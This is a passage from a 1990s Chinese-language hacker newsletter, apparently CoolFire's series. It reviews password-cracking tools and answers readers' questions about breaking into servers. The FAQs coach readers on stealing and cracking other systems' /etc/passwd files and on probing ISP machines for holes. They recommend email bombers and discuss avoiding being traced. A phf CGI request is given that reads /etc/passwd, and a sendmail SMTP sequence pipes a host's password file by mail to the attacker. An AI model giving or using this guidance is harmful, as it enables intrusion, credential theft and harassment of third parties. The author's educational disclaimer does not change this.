[Crack 工具介绍] John the Ripper V1.4 [Size:743K]
记得先前一直介绍大家使用 CJack V1.4 来破解密码档, 那是因为它 "够快", 在 Encrypt 的速度及
比对的速度上实在快了很多, 但是之後由於很多网友的作业环境是在 Windows 95 之下, 所以 Jack
不能跑, 我们就介绍大家使用 John the Ripper V1.1 这个 Passwrod Cracker~ 现在这套 Cracker
出了新的版本了, 经过我们的试用觉得应该好好的为它介绍一番, 原来一直声称速度上比 CJack14
还要快的 John, 经过实际上的测试, 总感觉速度没有 Jack 来得快, 虽然作者声称是因为他们这支
程式是以 486 机器作最佳化的, 在 386 上跑起来会比较慢, 但是旧的 V1.1 实在是比 Jack 还要慢
这也是大家都看得到的事实.
而 1.4 版在 EnCrypt 上实在是下了点功夫, 也对 Win32 版本有了支援, 当你下载解开後会发现里
面有 DOS.ZIP WIN32.ZIP SOURCE.TGZ 这三个档, 分别是在 DOS 下使用的版本, Win95,NT 下使用的
版本及 Unix 下使用的版本, 这时针对你所运用的作业环境作个选择, 将档案解开即可直接使用.
你还要再解开 COMMON.ZIP(共用档) 及 DOC.ZIP(说明档), 经过测试速度上明显提升很多, 但是我不
敢讲它比 Jack 要快多少, 至少在我的 Pentium 133 的机器上跑起来觉得差不多, 也没有谁比较快
谁比较慢的感觉~~ 不过以这样的档案大小 (7xxK) 能同时包含三种作业系统, 实在是不错的选择!!
当然这个程式里面只含了一个小小的字典档供你测试, 想要发挥它最大的效能还是先要有一个不错的
字典档, 但是新的版本中可以让你设定自动产生序数及字串比对(之前的好像也有吧?), 至於如何操
作, 我想他跟 Jack 及前一版本的操作方法相同, 就不用再多作介绍了~~ 以下是它的执行画面:
John the Ripper Version 1.4 Copyright (c) 1996,97 by Solar Designer
Usage: john [flags] [passwd files]
Flags: -pwfile:<file>[,..] specify passwd file(s)
-wordfile:<file> -stdin wordlist mode, read words from <file> or stdin
-rules enable rules for wordlist mode
-incremental[:<mode>] incremental mode [using john.ini entry <mode>]
-single single crack mode
-external:<mode> external mode, using john.ini entry <mode>
-restore[:<file>] restore session [from <file>]
-makechars:<file> make a charset, <file> will be overwritten
-show show cracked passwords
-test perFORM a benchmark
-users:<login|uid>[,..] crack this (these) user(s) only
-shells:[!]<shell>[,..] crack users with this (these) shell(s) only
-salts:[!]<count> crack salts with at least <count> accounts only
-lamesalts assume plaintext passwords were used as salts
-timeout:<time> abort session after a period of <time> minutes
-list list each word
-beep -quiet beep or don't beep when a password is found
-noname -nohash don't use memory for login names or hash tables
-des -md5 force DES or MD5 mode
有没有看到最後一行? 有 MD5 mode 的支援了哩~~~
嗯.. 介绍完了! 当然! 这支程式我们也传回来了, 你可以在我们的首页找到, 或者你也可以试
者 archie 看看有哪些 ftp site 有, 它的档名是 ucfjohn3.zip ENJOY~
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** CoolFire FAQ ****
许多东西没有空整理, 但是还是收集了一部分的问答出来, 如果这边有的就不要再来信询问了喔!!
[Q0]我抓了 KOS 但是抓到 1.2MB 左右就停了, 不晓得哪里还可以抓到.
[A0]如果你是想要我们站上 KOS 中的字典档, 那么很报歉, 因为这东西只有本站的 KOS 中有包,
在别的地方抓到的 KOS 不含我们这个字典档 (这是我们自己加料过的, 其它程式相同), 这也
是为甚么首页上的 KOS 如此大了~ 如果你所要的是 KOS 的程式, 那么你可以到 www.yahoo.com
这个搜寻引擎中找 "globalkos" 这个字串, 会有很多地下站台的列表, 接著你就可以在这些地
方找一个连线速度较快的主机抓取 KOS 了~~
[Q1]我尝试用 NETTERM 及 LetMeIn 进入自己所建立的纟统(SCO Unix V).
1. 因为帐号是本人的,所以我将密码放於在字典档第三行内.
2. 在LetMeIn中选定我的字典档.
3. 在NETTERM中输入我的帐号,然後按输入键.
4. 在Password 的出现後回到LetMeIn.
5. 按Start Break.
6. 当Delay Time到了,键盘上的"NumLock"闪过不停,
不过,过了第三行(猜想 ... 很久)也没有反应.老是停在Password这个浮标傍.
7. 当再选LetMeIn後看见字典档内的字逐一出现於最低的行内.
这好像没有按输入键.
请替我解答,可以么?
还想问问在那里可找到新的LetMeIn 及ClayMore版本
多谢帮忙.
[A1]
1. 连上主机, 待 user: 出现时不用输入你的 user id.
2. 启动 LetMeIn 1.0 选定字典档
3. 在 Setup Keys 中输入你的 User ID 并加上一个 '~' 号(代表 Enter
4. 在 After Keys 中输入 '~' 号, 表示密码输入完也要按 Enter.
5. 按下 Start Break, 在时间倒数完毕前将滑鼠点一下 telnet (Netterm)
程式视窗, 等待自动输入~~~~
ps... 以上.. 更正一下你的操作方式, 并请如果弄懂了 LetMeIn 的操作
方式时帮我写一下说明... 因为有太多人的操作都错了~~ 不晓得是不
是我的说明写得太差了哩 ??? LetMeIn 及 ClayMore 目前都未出新版本,
LetMeIn 2.0 的赶工还在加强中 (有 TCP/IP 部分的支援).
***
[Q2]我download了kabomb3.0,但又怕给查出来...我在网上有一个很嚣张的敌人呢!
[A2]KaBoom 3.0 经测试无法 Fake IP, 所以很可能会被查出来~~~ 不过要看 isp 配
不配合抓~~~ 也就是说因为拨接是动态 Ip, 较不容易查出(需透过 ISP)...但是如
果是假借它人帐号拨接, 又要看电信局配不配合抓了.
[Q3]那么有没有完全不会被查出的email bomber呢?∶-)
[A3]Windows 上的 AnonyMailer 就是了~~ 但没有强大的炸人功能~~ 用途为发一般
之匿名信件, 或是你可找 Unix 上的Bomb Script..在 Unix 上炸... 再不.. 就试
装 UpYours 罗~:)
***
[Q4]I can't get the email bomb files except the kabomb..Can you help me
solve this problem?
[A4]You can download it from my site. If there's some problem, you can mail
me~
***
[Q5] I trust that the GlobalKOS just down ..so I can get the KOS crack
files. Can you tell where I can get or put the file in your homepage?
Thanks you for you attention..
[A5]对~ 经过连结测试该 Server 好像已经没有回应了, 目前已将 Global KOS 档
案整理好放置於首页上供大家下载, 原先是遵重作者的反应不得放连结的, 现
在由於该 Server 停掉了, 所以就将档案放上来罗~ 快抓吧!
***
[Q6]ShaDow 系唔系唔可以解o架 !? 有o既话用边个程式呀 ? 点样先可以做到呢 ?
[A6]You can use deshadow like program to De-Shadow the shadowed file.
Or you can use 'ypcat ' command to view the shadowed file.
But almost ISP have been fix the hole. Good Luck.
[Q7]我个ISP 用 SUN/OS , D Sercuity 好劲o架 ! 我想睇 D档案时 , 会出现
Permission Denied , 我咪用 More / Less ! 然後用 ftp 想睇 , 用<!cat>
又唔准 ! get file 都唔得 ! 我知 个Passwd 档摆系边都罗唔到 ! 请问
你又有无办法去罗 个档案啊 !
[A7]SUN OS ?? You should to check that system again and tell me what version
is it ? And you should check what ftp deamon and what http deamon and
sendmail version. You should check everything about that server and try
to found every hole would be in that system. And try to get into the system.
After you get in. get more inFORMation from that server.
[Q8]我系你度罗o左个Guess Cracking Program ! 不过我都系唔知点样用 ! 我Upload
晒所有档案上去ISP Server 度 ! 然後就按 cc -o guess getpwdent.c <-例如 就
话我D规格错误 ! 搅到我用唔到 !
[A8]some ISP did not support c compiler function. So you should check about
it.
[Q9]点样o既档案先可以系 SUN / OS 度用嫁 ? 我搅o黎搅去都整唔到执行档 ! 咪就系
Guess 个程式罗 !
[A9]Sun OS always use shadow program. And the shadowed file may not found in
/etc directory, And may called '.shadow'. try found it in other directory.
[Q10]Global Kos 个Server 系咪有问题啊 ? 我上极去都上唔到啊 ! 如果唔介意可唔可以
Attach个档案俾我啊 ?
[A10]There's a little problem to that server. and i think it have been
shut-down
a while. So i will be put the program in my home page.
[Q11]Crack Jack 1.4 系唔系可以系 Sun/Os Or Unix 度用o架 ? 我有个朋友叫我用 系个
Server 做Crack Password ! 但系我就唔知点样可以用DOS o既 *.exe 档系SUN/Os OR
UNIX 度执行 !
[A11]CJack is running under dos mode. And it could not run under unix mode.
So if you want crack some password file. FTP it and put it into a dos OS
machine. Run CJack! 当然如果你坚持要在 Unix 系统下跑的话, 还是有这种软体
的, 最近新版的 John the Ripper V1.4 就有附 Source Code 可以让你在你的主机
上面 Compiler.... 但前提是你必须要有 c compiler 的权限呀~~ 快找一台机器吧!
***
[Q12]我对hacker这门课有些兴趣(虽然我一窍不通:-P ).想请教您几个问题:
我使用 " John the Ripper V1.0 " 来crack一个名叫 "passwd"的密码档,
但是很奇怪的,我执行後,显示了一些字,就跳回DOS了.好像根本没有执行crack的动作.
您能帮小弟找出原因吗?
画面如下:
C:\Hacker>john -beep -w:123.txt passwd
John the Ripper Version 1.0 Copyright (c) 1996 by Solar Designer
Loaded 0 accounts with 0 different salts
C:\Hacker>
123.txt是"字典档"(其实是四,五十个ID); passwd则是我们的"目标:密码档.
[A12]很正确的指令, 不过 0 accounts with 0 different salts 就有点怪了~~~
据我的判断你的 passwd 档是 shadow 过的档, 没有用~~~~ 所以 John 找不到
"有效的" 资料来判读~~~ 新版的 John 有一个 UnShadow.exe 的档案, 据说可
用来组合 shadow 及 passwd 使其还原, 不过前提还是要两个档都抓到, 如果
只抓到一个档是没有用的!! 记得上次有个软体声称其注册版可以解 shadow..
应改也是必需要先抓到 shadow 档吧!~~ 不过这好像没有甚么意义呀~~
[Q13]您听过一个叫: LANWATCH 的软体吗? 我听说它可以:过滤(拦截)Internet上的封包
资料,并可"监视"使用者的一举一动?! 哇!!!太帅了!您有它的相关资料吗?
[A13]No~~ 没玩过~~ 不过你是用拨接上线吗 ??? 那就别想了~~~~:)
[Q14]我这里有个 浏览器的Bomb(用java写的).据我自己(太牺牲了...)的测试,不论你是
用Netscape或MSIE, 它都会让你的浏览器一直重复开很多个视窗,直到记忆体耗完
为止!!! 不知您有无兴趣想要看看?
[A14]我也有个可 FORMAT C: 的 JAVA... 不过没用就是了~~ 哈哈~ 这种东西少玩....
我宁愿多破几间站台~~~ 嘻::::::: 快把 Java Option 关掉吧! 免得以後看我的
Page 会 FORMatting ?? <-- 开玩笑啦~~~
***
[Q15] 感谢您在网页上的资讯造福了我们这些刚入门的新手
根据您提供的方法,成功的取得 Linux.xxxxxxx.xxxx.xxx.tw 的 /etc/passwd 并找出 n
个 password ..... 但我在 tknet.tku.edu.tw 却碰了大钉子 ...:(
他们的 /etc/passwd 是 shadows 的, 我猜真正的 password 可能在/etc/master.passwd
, 但我没权限读取它 .... 经尝试了您网页提供的 3 个 Unix & Linux 的漏洞仍无效.
不知您有没有方法解决被 shadow 的 passwd....??
提供一个帐号您可进去看 ... login: ****** password: **** (这是淡大的密码格
式: 4位数字) 另,在 bbs 的 security 版有人提出现在的 www cracker 法:
www.xxx.xxx/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd 问题是出在 phf , 您知不
知道他的意思?
[A15] phf 的漏洞是在於 phf 本身自己的 Bug, 它并不会检查你的 UID, 且它执行了 system()
这个指令, 所以我们就可以利用它来作一些只有 root 才可以作的一些事情, 这是一个很
大的漏洞, 现在很多 ISP 都已经将此漏洞补上了~~~~ 这一篇文章中的说明应该就很清楚
了吧??
文章名称:如何破解系统(7)
信息来源:《黑客防线》 作者:CoolFire
发表日期:2001年08月15日
调试环境:
详细内容: 这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的
保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑,
我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人
Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !!
写这些文章真的花了蛮多时间的, 我也没办法确定甚么时候可以写好下一篇, 所以没有
办法预告, 因为预告不准的话会挨骂的. 以後写 CoohHC 的时间会少很多的, 因为工作
越来越多的关系, 希望大家见谅, 如果一两个月才出现一篇的话也不要骂我喔~ 如果你
曾经用印表机把这些文章一篇篇的印出来的话, 你就应该知道写这些东西有多辛苦了,
上次在朋友那边看到, 差点吐血!
首页上的网友交流版是一个不错的交流方式, 在 CoolHC 没有写的这段时间大家可以在
上面聊一聊自己的破解心得, 这样我也可以少写一些 FAQ, 当然在上面有经验的网友们
也可以分享一下你们的经验, 让一些新手快点进入状况, 不会再问一些怪问题~
**** Mail List 订阅 ****
事实上, CoolHC 写到这里已经没有甚么可以多讲的了, 因为有很多东西并不是用技巧来
破解, 我们所使用的都是系统的漏洞. 而这些漏洞, 有些由於已经出现了很久, 所以有
些网站也已经更新了这些问题, 你就没有办法得到你所预期的结果了. 除非你能够在他
们 Patch 之前先进入, 所以就必需要取得最新的 Bugs 资讯.
在网路上有很多系统安全讨论的 Mail List, 这些 Mail List 讨论的内容大多与各系统
的安全性有关, 所以在讨论内容上也都会围绕著新的 Bugs 打转, 如果能够善加的利用这
些资讯, 相信你可以在得到新的 Bug 资料时就轻易的拿下很多网站的密码档案.
所以在这一期的内容上, 我们就以如何订阅这些 Mail List 为主题, 让大家能够吸收到
这些新的资讯, 这样也不会等到 CoolHC 写好的时候, 大多数的 Bugs 都已经补上了.
[1] 8lgm (Eight Little Green Men)
加入方式: 写一封 E-Mail 到 majordomo@8lgm.org 标题不用填写, 在信件内容的地
方填上: subscribe 8lgm-list
[2] Academic Firewalls
加入方式: 写一封 E-Mail 到 majordomo@net.tamu.edu 标题不用填写, 在信件内容
的地方填上: SUBSCRIBE Academic-Firewalls
[3] Alert
加入方式: 写一封 E-Mail 到 request-alert@iss.net 标题不用填写, 在信件内容
的地方填上: subscribe alert
取消订阅: 写一封 E-Mail 到 request-alert@iss.net 标题不用填写, 在信件内容
的地方填上: unsubscribe alert
讨论主题: Security Product Announcements
Updates to Security Products
New Vulnerabilities found
New Security Frequently Asked Question files.
New Intruder Techniques and Awareness
[4] Best of Security
加入方式: 写一封 E-Mail 到 best-of-security-request@suburbia.net 标题不用
填写, 在信件内容的地方填上: subscribe best-of-security
[5] Bugtraq (CoolFire 推 )
加入方式: 写一封 E-Mail 到 LISTSERV@NETSPACE.OR 标题不用填写, 在信件内容的
容的地方填上: SUBSCRIBE BUGTRAQ
讨论主题: InFORMation on Unix related security holes/backdoors (past and
present)
Exploit programs, scripts or detailed processes about the above
Patches, workarounds, fixes
Announcements, advisories or warnings
Ideas, future plans or current works dealing with Unix security
InFORMation material regarding vendor contacts and procedures
Individual experiences in dealing with above vendors or security
organizations
Incident advisories or inFORMational reporting
[6] COAST Security Archive
加入方式: 写一封 E-Mail 到 coast-request@cs.purdue.edu 标题不用填写, 在信件
内容的地方填上: SUBSCRIBE coast
[7] Computer Privacy Digest (CoolFire 推 )
加入方式: 写一封 E-Mail 到 comp-privacy-request@uwm.edu 标题不用填写, 在信件
内容的地方填上: subscribe cpd
http://www.uwm.edu/org/comp-privacy/ (一些旧文章的收集, 蛮有用处的)
Gopher: gopher.cs.uwm.edu.
[8] Computer Underground Digest
加入方式: 写一封 E-Mail 到 CU-DIGEST-REQUEST@WEBER.UCSD.EDU 标题不用填写, 在
信件内容的地方填上: SUB CUDIGEST
新闻论坛: comp.society.cu-digest (USENET)
[9] Cypherpunks
加入方式: 写一封 E-Mail 到 majordomo@toad.com 标题不用填写, 在信件内容的
地方填上: SUBSCRIBE cypherpunks
[10] Cypherpunks Announce
加入方式: 写一封 E-Mail 到 majordomo@toad.com 标题不用填写, 在信件内容的
地方填上: SUBSCRIBE cypherpunks-announce
[11] Euro Firewalls
加入方式: 写一封 E-Mail 到 majordomo@gbnet.net 标题不用填写, 在信件内
容的地方填上: SUBSCRIBE firewalls-uk email-addr
[12] Firewalls
加入方式: 写一封 E-Mail 到 majordomo@greatcircle.com 标题不用填写, 在信件
内容的地方填上: SUBSCRIBE firewalls
[13] Intrusion Detection Systems
加入方式: 写一封 E-Mail 到 majordomo@uow.edu.au 标题不用填写, 在信件内容
的地方填上: subscribe ids
讨论主题: techniques used to detect intruders in computer systems and computer
networks
audit collection/filtering
subject profiling
knowledge based expert systems
fuzzy logic systems
neural networks
methods used by intruders (known intrusion scenarios)
cert advisories
scripts and tools used by hackers
computer system policies
universal intrusion detection system
[14] NT Security
加入方式: 写一封 E-Mail 到 request-ntsecurity@iss.net 标题不用填写, 在信
件内容的地方填上: subscribe ntsecurity
取消订阅: 写一封 E-Mail 到 request-ntsecurity@iss.net 标题不用填写, 在信
件内容的地方填上: unsubscribe ntsecurity
[15] WWW Security
加入方式: 写一封 E-Mail 到 www-security-request@nsmx.rutgers.edu 标题不用
填写, 在信件内容的地方填上: SUBSCRIBE www-security email_address
(上面的 email_address 填你自己的 E-Mail)
[16] Linux Security
加入方式: 写一封 E-Mail 到 majordomo@linux.nrao.edu 标题不用填写, 在信件
内容的地方填上: SUBSCRIBE linux-security your-name
(上面的 your-name 填你自己的名字, 最好填英文的, 怕他们看不懂)
[17] Linux Security Alert
加入方式: 写一封 E-Mail 到 majordomo@linux.nrao.edu 标题不用填写, 在信件
内容的地方填上: SUBSCRIBE linux-alert your-name
(上面的 your-name 填你自己的名字, 最好填英文的, 怕他们看不懂)
[18] Sun Security Alert
加入方式: 写一封 E-Mail 到 security-alert@sun.com 标题不用填写, 在信件内
容的地方填上: SUBSCRIBE CWS email-addr
(上面的 email-addr 填你自己 E-Mail)
上面我林林总总列出了 18 个 MailList, 请针对你喜欢的来订阅, 当然也可以全部订
阅, 日後觉得不需要哪一些的时候再取消掉, 在 MailList 上发信请注意 MailList 的
使用礼节及一些发信上应该注意的问题, 这些在订阅後自然会有说明寄给你. MailList
上有些会有存放 FAQ 的地方, 也请各位先看一看这些 FAQ 再发问. 嗯, 以後大家就要
靠自己罗, 若有新发现也别忘了来封信告诉我!!!!
**** Crack 工具 ****
[JackAss V1.1]
许多网友最喜欢的就是这一篇了, 所以这一篇好像是少不了的, 但是软体更新的速度事
实上可能没有我们的文章快. 上次介绍的 John the Ripper 1.3 大家用了觉得如何???
有没有甚么大问题呢? 应该还不错吧! 这次要介绍的是 JackAss V1.1 是我刚在国外网
页上抓回来的, 也不知道出现了多久, 看一下档案日期是 4-09-96, 好像已经出来很久
了, 都没有注意到它的存在.
一般我们以 CJack 来破解密码档案的时候, CJack 是以呼叫字典档, 然後逐字加密再进
行比对的方式来作解码的动作, 所以并不是所有的密码都找得到, 所以就有人想出以暴
力的方式来解码, 前题是机器够快, 然後时间够多, 才能避免浪费掉很多系统的时间.
CJack 在设计的理念上就是这样, 所以基本上还是略显不足, 所以才会有很多的辅助工
具出现, 像先前几篇我们所介绍的 KOS 就是一个例子.
JackAss 基本上是一个辅助 Jack 的工具, 跟 KOS 一样, 需要有 CJack 才能够执行,
他的英文注解是: Add On For CrackJack, 与 KOS 不同之处是: KOS 对 CJack 的不足
处作了补强, 让 CJack 可以跑出一些大小写数字混合的密码, 而 JackAss 则是一个完
全不同的方式, 他不需要使用任何的字典档, 因为它本身就是一个字典档产生器. 当你
使用 JackAss 来作为 CJack 的前导, 执行 JackAss 之後他会依照你的选项来制造出字
典档, 然後再呼叫 CJack 来跑这些字.
试了一下 JackAss 似乎功能上不怎么样, 有点类似国内上次出现的那支密码破解程式,
不过速度上倒是比较快, 如果你是要用暴力法来破解, 又有几台不错的机器, 你可以试
著在不同的机器上跑, 这样速度会快一点, 如果单用一台机器要跑暴力法, 可能就很累
了. 当然, 如果你可以只跑单一 User 的话, 速度会快一点, 所以我建议拿 JackAss 来
跑 root 的部份, 其它的用 GlobalKOS 来跑字典法就行了~~ 不要那么累!
之前在 tw.comp.security 看到有几位网友在讨论解码的文章, 其中有一位网友的观点
跟我的有点相像, 他的说法是: 将所有的字典档先编码, 存成一个大型的资料库, 当你
抓回密码档的时候, 直接用密码档来作逐行的比对, 这样速度上会快一点, 因为省去了
编码的时间. 如果有人要作这样的程式的话, 我想应该要有一个不小的硬碟, 用来储存
这个完成後颇大的资料库, 然後查询方面最好是用 SQL 来作查询, 速度上应该会快一点
因为在其它的查询方法上, 如果资料库非常庞大, 可以系统跑起来会像当机一般吧?? 再
者机器的速度应该也要够快, 最好呢, 能够写出一个 CGI 来 Call 这支程式, 让大家可
以在网页上丢出 passwd 档来查询, 再将查询完的结果寄回电子邮件信箱中. 这看起来
好像有点神话, 其实这很容易作到的, 只是没有人真的这样作, 是吗?? 目前还没预估过
这样作所须要的主机配备, 大家有空的时候帮忙想一想吧??
[WordList V1.0]
这个程式是一支字典档产生器, 他能产生五个字的字典档, 就是排列组合啦~ 也没有用
甚么特殊的方法, 使用他来产生字典可以产生一个相当大的字典, 不过速度上相当的慢
就是了, 这种程式所产生的字典有点暴力, 因为他跟本不依照字典的方式来产生, 但是
所产生的字也就相当的可观, 不过只要密马是五个字的, 都一定逃不过~ 属於暴力法的
一种. 速度慢? 慢到甚么程度呢? 你亲自的试一下就知道了, 我跑到一半就把它停掉了,
不晓得是用甚么语言写的, 还 For Win 3.x/95, 纯 DOS 下无法执行. 除了速度慢的缺
点之外, 这支程式所跑出来的字典档是五个字的, 我觉得真对五个字的密码来作解码是
有点暴力, 不过大家应该把自己的密码弄长一点, 因为之前我破解的一组密码, 居然有
人用一个英文字元来当密码, 系统管理人员应该将密码设定最少四个字元, 这样密码才
不容易被人盗用, 不然就将系统安全作得好一点, 不要让人轻易的拿到 passwd 档.
>> 这些档案你都可以在我们的首页中抓到!
**** 新旧短闻 ****
UpYours 4 好像还没有正式版本的消息, 不过最近 Beta3 已经推出了, 但是在 OTRiCS
所得到的消息, GlobalKos 决定放弃 UpYours 这个专案, 也就是说以後可能没有这套软
体可以用了. 也没有错啦, 最近的 Mail Server 跟 Server 间的传输是要经过认证的,
Mail Bomb 也对许多人造成了困扰, 甚至干扰到网路正常的运作, 认证之後可能会发生
你的匿名 Mail 无法真的匿名的问题, 劝大家还是少用吧! 有机会我会将可能是最後一
个版本的 UpYours Beta 3 放在首页上让大家留念, 上面这个消息还没有得到 GlobalKOS
这个 Group 的证实就是了.
详细的状况大家可以到: http://www.otrics.com/hackr1.html 翻翻看! 记得看仔细一点
喔, 因为有很多的资讯, 这边都有连结点啦~~
GlobalKOS 的站台在几个月前不明原因 "消失" 了, 有人可能还没有见过就连不上了, 我
找到了一个以前的 Mirror 点, 在上面也可以下载 KOS 及 UpYours, 有兴趣的网友可以
连到: http://www.wilter.com/ehack/files/misc/koskrack.html 瞧瞧~
使用 Windows 95 及 Windows NT 的网友, 应该已经被 Out-Of-Band 烦死了吧? 这个系
统的漏洞真的是害了许多人, 微软也还没有为这个事件发表甚么意见, 不过 for 95 的
Patch 已经出来了, Windows NT 的使用者也可以赶紧下载 Service Pack 3 来补一补!!
不然很可能下一秒钟被 ReBoot 的就是你的系统.
**** 首页统计 ****
我们的首页感谢大家的支持, 现在人数 20427 人次? 经过 Web Count 的追踪, 每天的
平均上站人次是: 274 人次, 至於上站的[时间/人数]对照如下表:
+---+---+---+---+---+---+---+---+---+---+---+---+---+
| 时| 00| 01| 02| 03| 04| 05| 06| 07| 08| 09| 10| 11|
+---+---+---+---+---+---+---+---+---+---+---+---+---+
| 人| 13| 13| 11| 8| 5| 5| 5| 5| 8| 9| 10| 11|
+---+---+---+---+---+---+---+---+---+---+---+---+---+
| 时| 12| 13| 14| 15| 16| 17| 18| 19| 20| 21| 22| 23|
+---+---+---+---+---+---+---+---+---+---+---+---+---+
| 人| 12| 12| 10| 11| 11| 12| 11| 11| 12| 12| 13| 13|
+---+---+---+---+---+---+---+---+---+---+---+---+---+
塞车时段: 22~01 疏通时段:04~07
+-----+-----+-----+-----+-----+-----+-----+
| SUN | MON | TUE | WED | THU | FRI | SAT |
+-----+-----+-----+-----+-----+-----+-----+
| 271 | 249 | 236 | 254 | 223 | 247 | 254 |
+-----+-----+-----+-----+-----+-----+-----+
感觉上都差不多, 星期天是多了一点
作这个统计, 可以让大家在上站的时候, 挑选比较好上站的时间, 这样才不会浪费你宝
贵的时间在等待资料的传输, 这些资讯你也可以在首页上点选 Web Story 按钮看到,
每个小时会更新一次, 请多多利用!
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
**** CoolFAQ ****
[Q0]
我自己有一个 Home Page, 我要如何在我的Home Page上连结你的首页呢???
[A0]
我们的首页连结图片放在:
首页连结, 请连结到:
http://www.showtower.com.tw/~fetag/Hack.htm
所以你只要在你的 HTML 档中加上底下这一行就可以了:
<a href=http://www.showtower.com.tw/~fetag/Hack.htm><img src=http://www.showtower.com.tw/~fetag/fetag.gif
alt="飞鹰工作室"></a>
[Q1]
我一进去的目录是"/",我用ls指令後都没有看到资料夹,有没有可能是把/etc/passwd隐
藏了呢?我进去时先出来的画面: 220 flag12 Microsoft FTP service (Verision2.0)
我又用了anonymous.ftp.这两个username进去,也成功了而且目录也都一样,那有没有可
能passwd不放在这里?
[A1]
因为一般我们在找 password 档的时候, 我们测试(实作)的 Server 都是使用 Unix 的 Server
来作, 所以我会写是 /etc/passwd, 照你这个情况看来, 你进入的 FTP Server 应该是 Window
NT 的系统(我也没有把握能够确定这件事), 如果是这样的状况的话, 一般的 WinNT
系统是不会有 /etc 这个目录的, 自然也就无法用 ls 指令看到了!
[Q2]
我觉得知道某人的IP又能怎样呢? 现在ISP都是使用不固定的IP呀? 若你说有纪录呀?
可是像我使用非自己的或是免费的呢?像我的网页就有告诉人家免费上网(中研院提供的)
查到IP也没用呀?为何还需要用E-mail bomb 的隐密IP呢?我实在想不通, 可以告诉我吗?
[A2]
对呀!! 但是如果该主机可以查出该 IP 的确实上线时间 (有 Log 档可查)另外也可以
再经由电信系统查甚么时候拨到哪支电话的电话号码, 循线就可以逮到你了~ 但是现在
电信局不太管这样的事, 不过如果你犯了很大的错, 有检察官要求他们查, 你说查不查
得到 ????? IP 固不固定又很重要吗 ??? 还是能 Fake IP 是最好的~~ 把 Ping关掉??
呵呵~~ 想通吧!
[Q3]
1.I can't download KeyPro Emu'. I think the location is wrong. Can you send
it
to me?
2.嗨...,UpYours3还是传不下来...能否告诉我其他地方哪里有? or用别的方法寄来?
(真的!没骗你,我每次下载到1.xMB时,就会卡住,都不动了...)
3.I can not download kos.zip by FTP. Can you use UUDECODE to past the
kos.zip
to me ?
[A3]
有很多网友在传档案的时候都会发生这种状况, 由於我的 ISP 日前将 DNS Server 及
Http Server 作了一些调整, 有些档案好像没有搬好的样子, 目录底下遗失了一些档案,
自然各位也就没有办法抓到了, 不过有很多档案可以在 File Mirror Site 抓到, 目前
我们有热心的网友提供了 ftp.cads.com.tw/pub/security 这个位址供本站 Mirror 一
些档案, 我也将一些较大, 大家比较不容易抓下来的档案都放了一份在上面, 所以不管
是甚么档案, 如果有抓不下来, 或是系统告诉你有连结错误的, 你都可以到这个 FTP
抓取, 不过该主机对 Anonymous 设限, 一次最多只能有 5 的使用者同时上线抓档, 如
果有连不上的, 就请你找个比较不塞车的时间再上去抓抓看! 我们没有办法提供 E-Mail
送档的服务, 虽然之前有帮几位网友送档, 但是现在有了 ftp 让各位自己抓取, 我们也
就不浪费网路的频宽及时间了.
[Q4]
我已经申请了cyberspace的帐号,请问要从那一个画面连上cyberspace,然後再去crack?
如果我用ftp or telnet进入了系统,那我的IP位址和我所做的任何动作会不会在那里留
下任何线索?
[A4]
我想你们都误会了我的意思, 不是说你 Login 进入 Cyberspace 再 Login 到别的站台,
别人就只会查到你在 Cyberspace 的帐号, 事实上当你 Login 进 Cyberspace 时, 也已
经暴露了你目前的 IP, 因为你 Login 的时候 Cyberspace 也会询问你的 IP.
[Q5]
1.你的站为什么关了?
2.I can't download Cracker Jack,KOS and other files,why?
This is the error message when I download "Cracker Jack 1.4":
Error 404
Not found - file doesn't exist or is read protected even tried multi
CERN httpd 3.0
3.When i join your Homepag, i receive the error:
HTTP/1.0 404 Object Not Found .
What has happend?
[A5]
那一阵子由於我的 ISP 这边传输的状况并不是很好, 所以有很多人可能连上来的时候找
不到东西了, 这个问题也一直困扰我很久, 但是也是没有办法真正的彻底解决, 所以如
果有这种状况的话, 请大家写信通知我一下, 如果是迁移到其它的 Web 站去, 或是暂时
停止服务的话, 我们也会在上面作一些说明, 不会有让大家找不到的情况发生的!
[Q6]
Sorry to bother you again,because I thought the "John the Ripper". can help
me
find out the register code which I want;however,can you hepl me to find out
the register code for the software "Xing MPEG Player 32-Bit 3012
Trial",which
I down loaded from ......
[A6]
居然有人会来找我问软体注册码的问题, 我可没有办法回答, 这不是我的专业, 当然破解
站台也不是我的专业, 所以如果有此类的问题的话, 请各位到 alt.hacker 论坛去发问,
或是在国内找找其它提供注册码的站台, 我没有办法帮你耶....:(
[Q7]
你知道吗?news上俞煌男有写一个程式是sendmail 收到password to you know?你是否也
有同样的program?and letmein 2.0不知进展如何?
[A7]
呵呵~~ Know How 是不是?? 其实要看他写出来的东西是针对哪个 Sendmail 版本啦, 像
很多版本的 Sendmail 都有被人家抓出一些 Bug 出来, 那也要看这个 Bug 的危险性到
甚么程度,一般这些东西都会有人整理出来, 但是如果 Mail Server 使用的刚好不是
Bug 有列出来的话, 你可能也没有办法了吧?? 我举一个很久以前在 Bugtraq 上面看到
的 sendmail bug 来作说明好了, 这个 Bug 的版本我忘了, 好像是 sendmail 5.6 的吧
(很久了), 现在不晓得还有没有人在用这个版本, 如果有的话, 就算他倒霉好了! 是这
样的, 这个版本的 Sendmail 可以让人执行一些指令, 所以我们可以利用这个漏洞把
passwd 档寄给自己, 而连到 smtp 就可以控制 sendmail 来发信了!
telnet xxx.xxx.xxx 25
helo MyDear
mail from: "|/bin/mail me@myhost </etc/passwd"
rcpt to: me@myhost
data
this is a test mail
像这样就可以让这台主机把他自己的 /etc/passwd 寄给我了, 但是也要看他有没有提供
mail这支程式, 有没有放在 /bin 目录, 像这目录也是很重要的, 有的例子我举出来像
cgi hole 我是举例他放在 /cgi-bin 目录, 但有些人的目录名称是 /cgi 或 /bin 或
/exe 就没有人会变通, 一直写信来问我, 为甚么照这个指令没有办法抓到... 等等, 很
